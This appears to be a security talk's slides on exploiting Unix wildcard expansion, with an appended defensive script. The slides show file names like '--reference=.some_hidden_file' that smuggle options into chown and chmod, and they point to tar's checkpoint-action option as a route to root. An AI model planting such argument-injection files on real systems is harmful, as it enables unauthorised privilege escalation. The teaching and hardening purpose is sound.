Date posted: 12-Apr-2017
Category: Software
Uploaded by: unidees-algerie
OLD SCHOOL HACKING: Exploiting UNIX Wildcards
Emir Fares BELMAHDI
[email protected] | @emirfares
www.unidees.dz
FOUR PARTS
• About Wildcards
• Exploiting Wildcards
• Some useful tricks
• Conclusion
ABOUT WILDCARDS
• A character used to substitute for any other character or characters
• Used in regular expressions
• Commonly used in shell commands in Linux and other Unix-like operating systems
• In this case, wildcards are interpreted by the shell before any action is taken
*     matches any number of characters in a filename, including none.
      Example: cat e*
?     matches any single character.
      Example: cat te?t.php
[ ]   Brackets enclose a set of characters, any one of which may match a single character.
      Example: cat file[123456789].txt
-     A hyphen used within [ ] denotes a range of characters.
      Example: cat file[1-9].txt
~     A tilde at the beginning of a word expands to the name of your home directory. If you append another user's login name to the character, it refers to that user's home directory.
      Examples: ls ~
                ls ~blackfox
EXPLOITING WILDCARDS
Files beginning with the (-) character are interpreted as command-line arguments.
Folder containing some files:
• File1
• File2
• --help
The user executes the command:
cat *
For each entry in the folder, this behaves like:
cat File1.txt -> file content (OK!)
cat File2.php -> file content (OK!)
cat --help -> "cat" command help & usage (MAGIC!)
USING STRACE
blackfox@dojo:~/wildcards$ strace cat *
execve("/bin/cat", ["cat", "File1.txt", "File2.txt", "--help"],[/* 69 vars */]) = 0

The three arguments after "cat" are the 1st file, 2nd file and 3rd file in the folder, so the command actually run is:
/bin/cat File1.txt File2.txt --help
DEMO
USEFUL TRICKS
CHOWN
blackfox@dojo:~/wildcards$ echo > ".some_hidden_file"
blackfox@dojo:~/wildcards$ chown user:user .some_hidden_file
blackfox@dojo:~/wildcards$ echo > "--reference=.some_hidden_file"
CHMOD
blackfox@dojo:~/wildcards$ echo > ".some_hidden_file"
blackfox@dojo:~/wildcards$ chmod 777 .some_hidden_file
blackfox@dojo:~/wildcards$ echo > "--reference=.some_hidden_file"
REAL LIFE SCENARIO: GETTING ROOT ACCESS
From the tar help manual (see: tar --help):
--checkpoint[=NUMBER] : display progress messages every NUMBERth record (default 10)
--checkpoint-action=ACTION : execute ACTION on each checkpoint
This allows executing arbitrary commands with the privileges of the user that runs "tar".
Let's imagine a backup script
DEMO
CONCLUSION
NEVER TRUST INPUTS
• Filter file names
AVOID USING WILDCARDS AS A PRIVILEGED USER (ROOT)
• Create a simple user instead
OR DON'T USE WILDCARDS AT ALL!
• Create your own scripts with the same features
ALWAYS TEST YOUR SECURITY
• Pentesting is important to detect vulnerabilities or misconfigurations
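
The "filter file names" advice above, as an added example that is not part of the original slides: it rebuilds the slides' folder (file contents are constructed), lists names that begin with "-", and compares `cat *` with two safe forms. The function names are hypothetical, and the `--` end-of-options marker and the `./` prefix are standard conventions the slides do not mention.

```shell
#!/bin/sh
# Added example, not from the original slides. File contents are constructed.

# Rebuild the slides' folder: two ordinary files plus one named "--help".
make_sample_dir() {
    d=$(mktemp -d) || return 1
    printf 'File1 content\n' > "$d/File1.txt"
    printf 'File2 content\n' > "$d/File2.txt"
    printf 'dash-file content\n' > "$d/--help"
    printf '%s\n' "$d"
}

# "Filter file names": print every entry in DIR whose name starts with "-".
find_dash_names() {
    for f in "$1"/-*; do
        [ -e "$f" ] || [ -L "$f" ] || continue   # an unmatched glob stays literal
        printf '%s\n' "${f##*/}"
    done
}

# Unsafe: the shell expands * first, so cat receives "--help" as an option.
cat_unsafe() { ( cd "$1" && cat * 2>&1 ); }

# Safe: "--" ends option parsing; every later argument is a file operand.
cat_end_of_options() { ( cd "$1" && cat -- * ); }

# Safe: ./* expands to ./--help, which does not start with "-".
cat_dot_slash() { ( cd "$1" && cat ./* ); }

# Demo run against the constructed folder.
dir=$(make_sample_dir)
echo "names starting with '-': $(find_dash_names "$dir")"
echo "--- cat * (first lines) ---"
cat_unsafe "$dir" | head -n 2
echo "--- cat -- * ---"
cat_end_of_options "$dir"
echo "--- cat ./* ---"
cat_dot_slash "$dir"
rm -rf -- "$dir"
```

Running `find_dash_names` over a directory before a privileged job touches it with a wildcard shows which names would be parsed as options.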